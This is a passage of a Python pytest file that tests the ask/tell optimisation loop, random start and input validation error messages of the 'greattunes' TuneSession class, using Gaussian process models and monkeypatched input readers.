[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8]], dtype=torch.double), False]
]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_response_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_response, random_start,
monkeypatch):
"""
test that a single loop of ask/tell works when providing response as kwarg to tell: creates a candidate, creates a
model, stores covariates and response. Monkeypatch "_read_response_manual_input" from ._observe.py to circumvent
manual input via builtins.input and provides response via kwargs
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# # monkeypatch "_read_response_manual_input"
# resp_tensor = torch.tensor([[12]], dtype=torch.double)
#
# def mock_read_response_manual_input(additional_text):
# return resp_tensor
# monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell(response_obs=kwarg_response)
### check for tell (no reason to assert for ask)###
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == kwarg_response[0,0].item() #resp_tensor[0, 0].item()
### check that acquisition function and model have been added
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
# check that an acquisition function has been added (only if some data present in train_X, train_Y at first step)
if train_X is not None:
assert cc.acq_func["object"] is not None
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_covariates, kwarg_response, random_start",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), True], # case 1 with random start
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), True], # case 2 with random start
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.7]], dtype=torch.double), torch.tensor([[1.8]], dtype=torch.double), False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8, 1.2, 107]], dtype=torch.double), torch.tensor([[103]], dtype=torch.double), False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8, 1.2, 107]], dtype=torch.double), torch.tensor([[0.8]], dtype=torch.double), False]
]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_covars_response_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_covariates,
random_start, kwarg_response):
"""
test that a single loop of ask/tell works when providing both covariates and response as kwarg to tell: creates a
candidate, creates a model, stores covariates and response.
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# run the ask method
cc.ask()
# run the tell method
cc.tell(covar_obs=kwarg_covariates, response_obs=kwarg_response)
### check for tell (no reason to assert for ask)###
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == kwarg_covariates[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == kwarg_response[0,0].item()
### check that acquisition function and model have been added
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
# check that an acquisition function has been added (only if some data present in train_X, train_Y at first step)
if train_X is not None:
assert cc.acq_func["object"] is not None
# test in single ask-tell loop for failures
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_covariates, error_msg",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8, 2.0]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([1.], dtype=torch.float64)', but got 'tensor([[1.8000, 2.0000]], dtype=torch.float64)'"], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, [1, 'a'], "must be real number, not str"], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8, 2.2]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([1.5000], dtype=torch.float64)', but got 'tensor([[1.8000, 2.2000]], dtype=torch.float64)'"],
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, ['b', 12.5], "too many dimensions 'str'"],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8, 0.2, 103, 12]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([ 1.1355, -3.1246, 105.4396], dtype=torch.float64)', but got 'tensor([[ 0.8000, 0.2000, 103.0000, 12.0000]], dtype=torch.float64)'"],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([0.8, 0.2, 103], dtype=torch.double), "greattunes.utils.__get_covars_from_kwargs: dimension mismatch in provided 'covars'. Was expecting torch tensor of size (1,<num_covariates>) but received one of size (3)."],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, [1, 2, 'a'], "must be real number, not str"]
]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_covars_fails(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_covariates, error_msg,
monkeypatch):
"""
test that a single loop of ask/tell fails when providing covars as kwarg to tell. Monkeypatch
"_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input and provides
covariates via kwargs
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
with pytest.raises(Exception) as e:
cc.tell(covar_obs=kwarg_covariates)
assert str(e.value) == error_msg
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_response, error_msg",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8, 2.2]], dtype=torch.double), "greattunes.utils.__get_response_from_kwargs: dimension mismatch in provided 'response'. Was expecting torch tensor of size (1,1) but received one of size (1, 2)."], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, ['a'], "too many dimensions 'str'"], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, [12, 'a'], "must be real number, not str"], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8, 2.2]], dtype=torch.double), "greattunes.utils.__get_response_from_kwargs: dimension mismatch in provided 'response'. Was expecting torch tensor of size (1,1) but received one of size (1, 2)."],
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, ['b', 12.5], "too many dimensions 'str'"],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, [0.8, 'b'], "must be real number, not str"],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8], [103]], dtype=torch.double), "greattunes.utils.__get_response_from_kwargs: dimension mismatch in provided 'response'. Was expecting torch tensor of size (1,1) but received one of size (2, 1)."],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([0.8, 103], dtype=torch.double), "greattunes.utils.__get_response_from_kwargs: dimension mismatch in provided 'response'. Was expecting torch tensor of size (1,1) but received one of size (2)."],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, [1, 'a'], "must be real number, not str"]
]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_response_fails(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_response, error_msg,
monkeypatch):
"""
test that a single loop of ask/tell fails when providing covars as kwarg to tell. Monkeypatch
"_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input and provides
covariates via kwargs
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# run the ask method
cc.ask()
# run the tell method
with pytest.raises(Exception) as e:
cc.tell(response_obs=kwarg_response)
assert str(e.value) == error_msg
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
]
)
def test_CreativeProject_integration_ask_tell_ask_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, monkeypatch):
"""
test that an iteration of ask-tell-ask works (like "test_CreativeProject_tell_integration_ask_tell_one_loop_works"
above. Specifically also test that this stores an acquisition function. Monkeypatch "_read_covars_manual_input"
and "_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell()
# run the ask method for a new data point
cc.ask()
# check acqusition function
assert cc.acq_func["object"] is not None
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
### assert for ask ###
# check that TWO entries has been added to cls.proposed_X
assert cc.proposed_X.size()[0] == 2
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated TWICE
assert cc.model["covars_proposed_iter"] == covars_proposed_iter + 2
### check for tell ###
# assert that ONE observation has been added for covariates
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that ONE observation has been added for the response
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
# assert that ONE observation has been added for x_data
assert cc.x_data.shape[0] == 1
for i in range(cc.x_data.shape[1]):
col = cc.x_data.columns[i]
cc.x_data[col].iloc[0] == candidate_tensor[0, i].item()
# assert that ONE observation has been added to y_data
assert cc.y_data.shape[0] == 1
assert cc.y_data["Response"].iloc[0] == resp_tensor[0, 0].item()
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1]
]
)
def test_CreativeProject_integration_ask_ask_tell_overwrite_candidate_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, monkeypatch):
"""
test that the first proposed new candidate datapoint is ignored if ask is run twice (without any tell). Test that
everything works downstream: creates a candidate, creates a model, stores covariates and response.
Monkeypatch "_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual
input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# set attributes on class (to simulate previous iterations of ask/tell functionality). That is, set attributes set
# both by _Initializers__initialize_training_data and by _Initializers__initialize_random_start
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the ask method AGAIN
cc.ask()
# run the tell method
cc.tell()
### assert for ask ###
# check that an entry has been added to cls.proposed_X
assert cc.proposed_X.size()[0] == train_X.size()[0] + 1
assert cc.proposed_X[-1].size()[0] == train_X.size()[1] # check that the new candidate has the right number of entries
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated ONLY ONCE
assert cc.model["covars_proposed_iter"] == covars_proposed_iter + 1
### check for tell ###
# assert that ONE new observation has been added for covariates
assert cc.train_X.size()[0] == train_X.size()[0] + 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that ONE new observation has been added for the response
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
# test with repeat "tell" that train_X, train_Y last row is only added once
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1]
]
)
def test_CreativeProject_integration_ask_tell_tell_overwrite_covar_resp_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, monkeypatch):
"""
test that the first reported datapoint for covars and response (last entries in train_X, train_Y) are overwritten if
tell is run twice (without two iterations of ask). Only the last datapoint entry should remain. Test that
everything works downstream: creates a candidate, creates a model, stores covariates and response.
Monkeypatch "_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual
input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=False)
# ISSUE IS THAT I AM CIRCUMVENTING THE INITIALIZATION OF RANDOM POINTS WHICH REQUIRES THAT TRAIN_X, TRAIN_Y
# INITIALIZATION HAS FINISHED. I NEED TO SET RANDOM INITIALIZATION PARAMTERES MANUALLY BELOW
#
# ALSO MAKE SURE I DO AT LEAST ONE TEST WHERE I DO THE FULL E2E TEST (ALLOWING FOR AUTOMATICALLY CREATING RANDOM
# INITIALIZATION)
# set attributes on class (to simulate previous iterations of ask/tell functionality). That is, set attributes set
# both by _Initializers__initialize_training_data and by _Initializers__initialize_random_start
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.x_data = tensor2pretty_covariate(train_X_sample=train_X, covar_details=cc.covar_details)
cc.y_data = tensor2pretty_response(train_Y_sample=train_Y)
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# define decorator to add 1.0 to all entries in monkeypatched returned data. This to be able to tell that the last
# entry (from second "tell") is different than the first, and know that it has been overwritten
def add_one(func):
@functools.wraps(func)
def wrapper_add_one(*args, **kwargs):
wrapper_add_one.num_calls += 1
output = func(*args, **kwargs)
return output + wrapper_add_one.num_calls
wrapper_add_one.num_calls = 0
return wrapper_add_one
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
@add_one
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
@add_one
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell()
# run the tell method AGAIN
cc.tell()
### assert for ask ###
# check that an entry has been added to cls.proposed_X
assert cc.proposed_X.size()[0] == train_X.size()[0] + 1
assert cc.proposed_X[-1].size()[0] == train_X.size()[1] # check that the new candidate has the right number of entries
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated
assert cc.model["covars_proposed_iter"] == covars_proposed_iter + 1
### check for tell ###
# assert that ONLY ONE new observation has been added for covariates
assert cc.train_X.size()[0] == train_X.size()[0] + 1
assert cc.x_data.shape[0] == cc.train_X.size()[0]
# assert that the right elements have been added to the covariate observation (should be candidate_tensor with
# "add_one" applied twice, i.e. adding 2.0 to each entry)
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item() + 2.0
col = cc.x_data.columns[i]
assert cc.x_data[col].iloc[-1] == candidate_tensor[0, i].item() + 2.0
# assert that ONLY ONE new observation has been added for the response
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
assert cc.y_data.shape[0] == train_Y.size()[0] + 1
# assert that the right elements have been added to the response observation (should be resp_tensor with "add_one"
# applied twice, i.e. adding 2.0 to each entry)
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item() + 2.0
assert cc.y_data["Response"].iloc[-1] == resp_tensor[0, 0].item() + 2.0
# test that model is updated (overwritten)
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
]
)
def test_CreativeProject_integration_ask_tell_ask_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, monkeypatch):
"""
test that both surrogate model and acquisition functions are added and updated following two rounds of ask-tell.
Monkeypatch "_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual
input via builtins.input. This automatically tests the new functionality of random start by starting from no data
(train_X, train_Y)
"""
# initialize the class
# random_start = True is default, so this tests random start
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# define decorator to add 1.0 to all entries in monkeypatched returned data. This to be able to tell that the last
# entry (from second "tell") is different than the first, and know that it has been overwritten
def add_one(func):
@functools.wraps(func)
def wrapper_add_one(*args, **kwargs):
wrapper_add_one.num_calls += 1
output = func(*args, **kwargs)
return output + wrapper_add_one.num_calls
wrapper_add_one.num_calls = 0
return wrapper_add_one
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
@add_one
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
@add_one
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell()
# test that data is added to pretty formats
assert cc.x_data.shape[0] == 1
for i in range(candidate_tensor.size()[1]):
col = cc.x_data.columns[i]
assert cc.x_data[col].iloc[-1] == candidate_tensor[0, i].item() + 1
assert cc.y_data.shape[0] == 1
assert cc.y_data["Response"].iloc[-1] == resp_tensor[0, 0].item() + 1
# grab the model state
surrogate_model1 = cc.model["model"]
# run the ask method AGAIN
cc.ask()
# grab the acquisition function
acq_func1 = cc.acq_func["object"]
# run the tell method AGAIN
cc.tell()
# test that new rows are added to pretty format data
print(candidate_tensor)
print(cc.x_data)
assert cc.x_data.shape[0] == 2
for i in range(candidate_tensor.size()[1]):
col = cc.x_data.columns[i]
assert cc.x_data[col].iloc[-1] == candidate_tensor[0, i].item() + 2
assert cc.y_data.shape[0] == 2
assert cc.y_data["Response"].iloc[-1] == resp_tensor[0, 0].item() + 2
# grab the model state
surrogate_model2 = cc.model["model"]
# run the ask method a THIRD TIME
cc.ask()
# grab the acquisition function
acq_func2 = cc.acq_func["object"]
# assert that both model and acquisition functions exist
assert cc.model["model"] is not None
assert cc.acq_func["object"] is not None
# assert that surrogate model has updated
assert surrogate_model1 != surrogate_model2
# assert that acquisition function has updated
assert acq_func1 != acq_func2
@pytest.mark.parametrize(
"train_X, train_Y, random_sampling_method",
[
[None, None, "random"],
[None, None, "latin_hcs"],
[torch.tensor([[1.1, 2.1, 23.7]], dtype=torch.double), torch.tensor([[10.7]], dtype=torch.double), "random"],
[torch.tensor([[1.1, 2.1, 23.7],[1.9, 1.8, 18.2]], dtype=torch.double), torch.tensor([[10.7], [13.2]], dtype=torch.double), "random"],
[torch.tensor([[1.1, 2.1, 23.7],[1.9, 1.8, 18.2]], dtype=torch.double), torch.tensor([[10.7], [13.2]], dtype=torch.double), "latin_hcs"],
]
)
def test_CreativeProject_integration_ask_tell_ask_tell_randon_start_works(train_X, train_Y, random_sampling_method,
monkeypatch):
"""
test that ask-tell dynamics works with random start, with and without train_X, train_Y data being provided.
Monkeypatching user input
"""
covars = [(1, 0, 2), (1.5, -1, 3), (22.0, 15, 27)]
num_initial_random = 1
# initialize the class
cc = TuneSession(covars=covars, train_X=train_X, train_Y=train_Y, random_start=True,
random_sampling_method=random_sampling_method, num_initial_random=num_initial_random)
# define decorator to add 1.0 to all entries in monkeypatched returned data. This to be able to tell that the last
# entry (from second "tell") is different than the first, and know that it has been overwritten
def add_one(func):
@functools.wraps(func)
def wrapper_add_one(*args, **kwargs):
wrapper_add_one.num_calls += 1
output = func(*args, **kwargs)
return output + wrapper_add_one.num_calls
wrapper_add_one.num_calls = 0
return wrapper_add_one
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
@add_one
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
@add_one
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# check the number of iterations we're starting from
curr_iter = 0
if train_X is not None: # enough to look at train_X since validator ensures train_X, train_Y have same number of rows
curr_iter = train_X.size()[0]
assert cc.model["covars_proposed_iter"] == curr_iter
assert cc.model["covars_sampled_iter"] == curr_iter
assert cc.model["response_sampled_iter"] == curr_iter
# run the ask method
cc.ask()
